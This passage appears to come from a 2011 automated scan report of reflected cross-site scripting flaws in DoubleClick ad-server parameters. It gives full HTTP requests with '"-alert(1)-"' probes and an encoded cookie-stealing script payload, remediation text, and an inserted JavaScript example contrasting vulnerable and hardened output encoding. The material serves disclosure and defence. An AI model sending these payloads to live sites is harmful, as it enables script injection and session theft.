53B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9729
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... icles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951d1dd4"-alert(1)-"7f0ce352b24&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8de9"-alert(1)-"949f2676f9f was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798c8de9"-alert(1)-"949f2676f9f&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9729
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798c8de9"-alert(1)-"949f2676f9f&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3 ...[SNIP]...
The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9b6a"-alert(1)-"cafab609dca was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3Fd9b6a"-alert(1)-"cafab609dca&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:33:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9723
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3Fd9b6a"-alert(1)-"cafab609dca&redirectURL=http%3a%2f%2flp2.turbotax.com/ty10/bn/geo_tx%3Fcid%3Dbn_im_nf_anb_opgeotxT_txG_pk_300x250%26priorityCode%3D4654800000"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = " ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15c43"-alert(1)-"cd748a8fe0a was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=15c43"-alert(1)-"cd748a8fe0a HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4961
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 02 Feb 2011 20:27:49 GMT
Expires: Wed, 02 Feb 2011 20:27:49 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=15c43"-alert(1)-"cd748a8fe0ahttp://degrees.classesusa.com/schools/?sourceid=50545246-232704189-39897819"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWindow = "false"; var winW = 300; var winH = ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 138f5"-alert(1)-"eada4e3efbc was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA138f5"-alert(1)-"eada4e3efbc&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:26:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... i8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA138f5"-alert(1)-"eada4e3efbc&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819"); var wmode = "opaque"; var bg ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66758"-alert(1)-"219072ecf8b was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
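The findings above all share one mechanism: a request value is pasted into JavaScript source, so the probe's first double quote closes the string literal and the rest is parsed as code. The block below is an added example, not code from the scan report or from the ad servers it describes. It reconstructs the shape of the vulnerable context seen in these responses (a value concatenated into var x = escape("...") inside a script block) to show why "-alert(1)-" runs, then emits the same value safely; it also covers the HTML attribute context of the SRC="...site_code=..." findings later in this report. The names clickTag, renderVulnerable, renderHardened, renderTag and run are this example's own; the probe strings are the report's.

```javascript
// Added example, not from the scan report or the ad servers it describes.
// Reconstructs the vulnerable context (request value concatenated into
// `var clickTag = escape("...")`) and contrasts it with a safe encoding.
// Names below are assumed for illustration; probe strings are the report's.

// Vulnerable shape: the raw parameter is pasted into JavaScript source, so
// the first double quote in it terminates the string literal and whatever
// follows is parsed as code. "..."-alert(1)-"..." is a subtraction
// expression, which is why the probe needs no < > or ; to execute.
function renderVulnerable(clickUrl) {
  return 'var clickTag = escape("' + clickUrl + '");';
}

// Hardened shape: serialise the value as a JSON string literal, which
// backslash-escapes " and \, then \u-escape the characters that matter to
// the HTML parser or to the JS line grammar (< > & / U+2028 U+2029), so the
// literal can neither close itself nor close the enclosing <script> element.
function jsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\/\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderHardened(clickUrl) {
  return 'var clickTag = escape(' + jsStringLiteral(clickUrl) + ');';
}

// HTML attribute context (the SRC="...site_code=..." findings): percent-
// encode the value as a URL query component first, then entity-encode for
// the attribute, so neither " nor > can end the attribute or the tag.
function htmlAttr(value) {
  return String(value).replace(/[&<>"']/g, (c) => '&#' + c.charCodeAt(0) + ';');
}

function renderTag(siteCode) {
  return '<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?site_code=' +
    htmlAttr(encodeURIComponent(siteCode)) + '"></SCRIPT>';
}

// Execute a rendered script fragment with a stub alert that records whether
// it fired, and return clickTag's final value alongside that flag.
function run(snippet) {
  let fired = false;
  const alert = () => { fired = true; return 0; };
  const clickTag = new Function('alert', snippet + ' return clickTag;')(alert);
  return { fired, clickTag };
}

// The sz/sa probe from the ad.doubleclick.net finding above.
const probe = 'http://googleads.g.doubleclick.net/aclk?sa=l31220"-alert(1)-"5c310f7490c';

function demo() {
  return {
    vuln: run(renderVulnerable(probe)),  // fired: true, clickTag: "NaN"
    safe: run(renderHardened(probe)),    // fired: false, clickTag: escape(probe)
  };
}
```

In the vulnerable rendering the stub alert fires and clickTag ends up as "NaN" (the string minus a number), which is exactly what the scanner's "-alert(1)-" probe is designed to prove. In the hardened rendering the same bytes survive as data: clickTag equals escape(probe), and the \u-escaping of < and / means a value containing </script> cannot terminate the script element either, a case that JSON.stringify alone does not cover.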
Request
GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-453708552427379466758"-alert(1)-"219072ecf8b&adurl=;ord=699026599? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 20:27:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4981
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page -- ...[SNIP]... 2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=1&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-453708552427379466758"-alert(1)-"219072ecf8b&adurl=http%3a%2f%2fdegrees.classesusa.com/schools/%3Fsourceid%3D50545246-232704189-39897819"); var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never"; var openWindow = "false"; var winW ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78291"-alert(1)-"1aa4fa9a8f0 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N3285.google/B2343920.91;sz=300x250;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BoYz9ublJTdS3OKHLsQer86zYB5PMjd0Bs7-ixBjbjrqKUYCXIhABGAEgpPSYAzgAULbI36sHYMm-somQpNARoAGZjZzuA7IBD2JvYXJkcmVhZGVyLmNvbboBCjMwMHgyNTBfYXPIAQnaAXZodHRwOi8vd3d3LmJvYXJkcmVhZGVyLmNvbS9kb21haW4vMm1kbi5uZXQveDIyP2ViZWY3JTIyJTNFJTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0U2ZjY5Njk4MmE2ZD0x4AEC-AEBuAIYwAIByALrprsMqAMB0QMIYrQRpruKOfUDAAAAxA&num=178291"-alert(1)-"1aa4fa9a8f0&sig=AGiWqtyV_xNTt-YUFvVaZyar10BDgj8P2w&client=ca-pub-4537085524273794&adurl=;ord=699026599? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4537085524273794&format=300x250_as&output=html&h=250&w=300&lmt=1296698959&channel=3510583841&ad_type=text_image&alternate_ad_url=http%3A%2F%2Fboardreader.com%2Faffiliate%2Fgagbanner.html%3Fsize%3Dside%26rand%3D6382924&color_bg=FFFFFF&color_border=FFFFFF&color_link=105cb6&color_text=333333&color_url=4F7500&flash=10.1.103&url=http%3A%2F%2Fboardreader.com%2Fdomain%2F2mdn.net%2Fx22%3Febef7%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E6f696982a6d%3D1&dt=1296677358999&shv=r20101117&jsv=r20110120&saldr=1&prev_fmts=468x60_as&correlator=1296677358676&frm=0&adk=3794557511&ga_vid=1197951510.1296677341&ga_sid=1296677341&ga_hid=700497370&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1020&bih=969&fu=0&ifi=2&dtd=24&xpc=gTmsrpKGsX&p=http%3A//boardreader.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) 